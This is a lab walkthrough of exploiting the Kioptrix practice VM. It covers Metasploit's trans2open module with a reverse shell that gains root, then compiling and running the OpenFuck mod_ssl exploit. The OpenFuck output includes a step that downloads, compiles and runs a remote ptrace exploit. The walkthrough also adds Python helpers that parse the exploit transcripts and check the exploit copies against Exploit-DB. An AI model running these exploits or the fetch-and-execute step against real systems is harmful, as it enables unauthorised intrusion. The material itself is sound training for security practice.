Getting Root with Metasploit

Before we pop a shell on Kioptrix, let's pick the exploit we want to use. Going back to the ones we found through searchsploit, we can even find one that has a known Metasploit module.

Since it showed up so often in the output, let's try trans2open.

Running Metasploit

Once we have executed msfconsole and are inside the Metasploit console, we can look for trans2open with the search command:

```
msf6 > search trans2open

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index. For example info 3, use 3 or use exploit/solaris/samba/trans2open
```

use

From this list we can use the use command to choose a specific module and enter its context (make sure to choose one which matches the target):

```
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) >
```

options

Now that our context is set, we can use options to see which configurable variables the module has:

```
msf6 exploit(linux/samba/trans2open) > options

Module options (exploit/linux/samba/trans2open):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see <link>
   RPORT   139              yes       The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
```

In this case we need to set RHOSTS; RPORT (remote port), LHOST (local host) and LPORT (local port) have already been set for us (we can change them if needed).

set

To set these options we use the set command followed by the option we want to set and its new value:

```
msf6 exploit(linux/samba/trans2open) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
```

show

With the show command we can verify the module's targets (not the target host). This covers the service we are exploiting as well as the technique:

```
msf6 exploit(linux/samba/trans2open) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Samba 2.2.x - Bruteforce
```

show can also list encoders, nops, exploits, payloads, auxiliary modules, post modules, plugins, info, options and favorites (all relative to the Metasploit framework and the context we are in); use show all to get every one of these lists at once.

run / exploit

Once we have verified the context and the variables, we can run our exploit with the run or exploit command:

```
msf6 exploit(linux/samba/trans2open) > exploit       # <- staged payload

[*] Started reverse TCP handler on 10.0.2.4:4444
[*] 10.0.2.5:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffbfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffafc...
[*] Sending stage (1017704 bytes) to 10.0.2.5 # <- sending stage is a good sign
[*] 10.0.2.5 - Meterpreter session 1 closed. Reason: Died
[*] 10.0.2.5:139 - Trying return address 0xbffff9fc...
[*] Sending stage (1017704 bytes) to 10.0.2.5
[*] 10.0.2.5 - Meterpreter session 2 closed. Reason: Died
[-] Meterpreter session 2 is not valid and will be closed
[*] 10.0.2.5:139 - Trying return address 0xbffff8fc...
[*] Sending stage (1017704 bytes) to 10.0.2.5
[*] 10.0.2.5 - Meterpreter session 3 closed. Reason: Died
[*] 10.0.2.5:139 - Trying return address 0xbffff7fc...
[*] Sending stage (1017704 bytes) to 10.0.2.5
[*] 10.0.2.5 - Meterpreter session 4 closed. Reason: Died
[*] 10.0.2.5:139 - Trying return address 0xbffff6fc...
[*] 10.0.2.5:139 - Trying return address 0xbffff5fc... # <- we know it's failed
^C
[-] 10.0.2.5:139 - Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
```

The exploit did not work, partly because we never set a payload. Instead, Metasploit fell back to the default payload (linux/x86/meterpreter/reverse_tcp). We can tell from its path that it is a "staged payload", which is probably part of the reason it failed.

set

To set our own payload we again use the set command. The payload is what Metasploit actually injects into memory, which we can reach through this buffer overflow. To see the list of all payloads, start typing set payload and then press Tab twice to see every available option:

```
msf6 exploit(linux/samba/trans2open) > set payload 
set payload generic/custom
set payload generic/debug_trap
set payload generic/shell_bind_aws_ssm
set payload generic/shell_bind_tcp
set payload generic/shell_reverse_tcp
...
```

In this case we need a payload that will execute successfully on a Linux target.

```
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf6 exploit(linux/samba/trans2open) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] 10.0.2.5:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffbfc...
[*] Command shell session 12 opened (10.0.2.4:4444 -> 10.0.2.5:32800) at 2023-09-30 16:43:23 -0400
whoami
root # <--- output from target
```
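The two runs above differ only in the payload, and the reasoning is "stage sent, session died every time, staged payload path" versus "command shell session opened". The following is an added example, not code from the original notes: it classifies a payload path as staged or stageless from Metasploit's naming convention (stage and stager as separate path components versus fused with an underscore; the STAGE_NAMES set is an assumption covering the meterpreter/shell families) and reads an msfconsole transcript the same way the text does. The transcripts are constructed from the lines shown above.

```python
import re
from collections import Counter

# Assumed set of stage names seen as "<platform>/<stage>/<stager>" in staged paths.
STAGE_NAMES = {"meterpreter", "shell", "mettle", "vncinject"}

def payload_kind(path):
    """Staged: stage and stager in separate components (linux/x86/meterpreter/reverse_tcp);
    stageless: fused with an underscore (linux/x86/shell_reverse_tcp)."""
    parts = path.split("/")
    if (len(parts) >= 2 and parts[-2] in STAGE_NAMES
            and re.fullmatch(r"(reverse|bind)_\w+", parts[-1])):
        return "staged"
    if re.search(r"_(reverse|bind)_", parts[-1]):
        return "stageless"
    return "other"

STAGE_SENT = re.compile(r"^\[\*\] Sending stage \(\d+ bytes\) to ")
SESSION_DIED = re.compile(r"session \d+ closed\.\s+Reason: Died")
SESSION_OPEN = re.compile(r"session \d+ opened")

def analyse_run(output):
    """Count stage deliveries and dead/opened sessions in an msfconsole transcript."""
    counts = Counter()
    for line in output.splitlines():
        if STAGE_SENT.search(line):
            counts["stages_sent"] += 1
        elif SESSION_DIED.search(line):
            counts["sessions_died"] += 1
        elif SESSION_OPEN.search(line):
            counts["sessions_opened"] += 1
    return dict(counts)

def diagnose(output, payload):
    """Stage sent but dying every time points at the (staged) payload, not the overflow."""
    c = analyse_run(output)
    if c.get("sessions_opened"):
        return "session opened"
    if c.get("stages_sent") and payload_kind(payload) == "staged":
        return "stager ran but every stage died (staged payload problem)"
    return "no stage delivered (overflow or return address not hit)"

# Constructed transcripts modelled on the two runs shown above.
FAILED_RUN = """\
[*] Sending stage (1017704 bytes) to 10.0.2.5
[*] 10.0.2.5 - Meterpreter session 1 closed. Reason: Died
[*] Sending stage (1017704 bytes) to 10.0.2.5
[*] 10.0.2.5 - Meterpreter session 2 closed. Reason: Died
"""
OPENED_RUN = "[*] Command shell session 12 opened (10.0.2.4:4444 -> 10.0.2.5:32800)\n"
```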

# Getting root "manually"
Instead of letting Metasploit do everything for us, we can achieve the same result manually.

OpenFuck

OpenFuck is the other exploit we found that Kioptrix may be vulnerable to. Let's try exploiting Kioptrix manually with it.

Using Searchsploit

We can get the OpenFuck exploit code from Exploit-DB or with the searchsploit command (since we already have a local copy of most of the Exploit-DB database on hand).

```
searchsploit openfuck
----------------------------------------------------------------------- --------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- --------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c'                          | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c'                        | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c'                        | unix/remote/764.c
----------------------------------------------------------------------- --------------------
Shellcodes: No Results
```

We have 3 versions of OpenFuck on hand. We will use OpenFuck.c, which lives at /usr/share/exploitdb/exploits/unix/remote/21671.c. Rather than using that copy in place, we copy it into a new folder called kioptrix:

```
mkdir kioptrix
cp /usr/share/exploitdb/exploits/unix/remote/21671.c kioptrix/21671.c
```

Before executing some random malware on our own machine, let's check it against the official repository listed on Exploit-DB (hosted on GitLab). Both Exploit-DB and the repository mark this code as "EDB Verified", meaning they have tested it themselves.
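Checking the local searchsploit copy against the upstream repository can be done mechanically rather than by eye. The following is an added example, not the notes' own code: it hashes the local file and the upstream file, and on a mismatch prints a unified diff so that any change to the exploit source is visible before it is compiled. The raw-file URL layout of the Exploit-DB GitLab repository is an assumption; the sample inputs in the test are constructed.

```python
import difflib
import hashlib
import urllib.request

# Assumed raw-file URL layout of the Exploit-DB GitLab repository (not from the text).
RAW_URL = "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/{}"

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def compare_copies(local, reference):
    """Return (identical, diff_lines). A hash match means the local searchsploit
    copy is byte-for-byte the upstream file; otherwise show what differs."""
    if sha256_hex(local) == sha256_hex(reference):
        return True, []
    diff = difflib.unified_diff(
        reference.decode("utf-8", "replace").splitlines(),
        local.decode("utf-8", "replace").splitlines(),
        fromfile="upstream exploitdb", tofile="local copy", lineterm="")
    return False, list(diff)

def verify_local_exploit(local_path, edb_relpath, fetch=urllib.request.urlopen):
    """Compare a local copy with the upstream file, e.g.
    verify_local_exploit("kioptrix/21671.c", "unix/remote/21671.c")."""
    with open(local_path, "rb") as fh:
        local = fh.read()
    with fetch(RAW_URL.format(edb_relpath)) as resp:
        reference = resp.read()
    return compare_copies(local, reference)
```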

Running OpenFuck.c

If we cat the OpenFuck code we find some instructions at the top of the file:

```c
/*
source: https://www.securityfocus.com/bid/5363/info

A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.

***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available.
*/
/*
 * VERY PRIV8 spabam SPAX@zone-h.org
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
 *
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
...
```

We can see from the output that we need to compile the code using gcc:

```
gcc -o openfuck 21671.c -lcrypto
21671.c:715:31: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function); did you mean ‘SSL3_MAX_SSL_SESSION_ID_LENGTH’?
  715 | unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
      |                       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      |                       SSL3_MAX_SSL_SESSION_ID_LENGTH
21671.c:723:9: error: unknown type name ‘RC4_KEY’
  723 | RC4_KEY* rc4_read_key;
```

Unfortunately this code is old and does not compile cleanly. So we either have to fix all the errors ourselves or find someone who has already done so.

Finding a working version

When we used searchsploit to look up all the exploit code related to OpenFuck, three versions were listed, one of them being OpenFuckV2.c with ID 47080. We can cp it into our kioptrix directory like so:

```
cp /usr/share/exploitdb/exploits/unix/remote/47080.c openfuck.c
```

Looking this version up on Exploit-DB, we can see it is not verified the way ID 21671 is. But if we visit the GitLab repository we can try to verify the code ourselves.

We can then try compiling it with gcc:

```
gcc -o openfuck of.c -lcrypto
of.c: In function ‘read_ssl_packet’:
of.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  534 |                 RC4(ssl->rc4_read_key, rec_len, buf, buf);
...
```

This time gcc only lists warnings and no errors, and if we check the directory we can see that our openfuck binary exists.

Exploitation

To figure out how to use our binary against the target, we can run it without any flags and see whether the output gives us a usage hint:

```
./openfuck

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./openfuck target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)

Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
...
```

We need to scroll through the "Supported OffSet" list to find our target:

```
...
0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
```

Execution

Command and output:

```
./openfuck 0x6b 10.0.2.5 -c 45
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
...

Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8100
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--07:58:31-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c`
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c`: No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ # <---- rev shell
bash-2.05$ whoami # <---- our test command
whoami
apache # <---- output on target machine
```
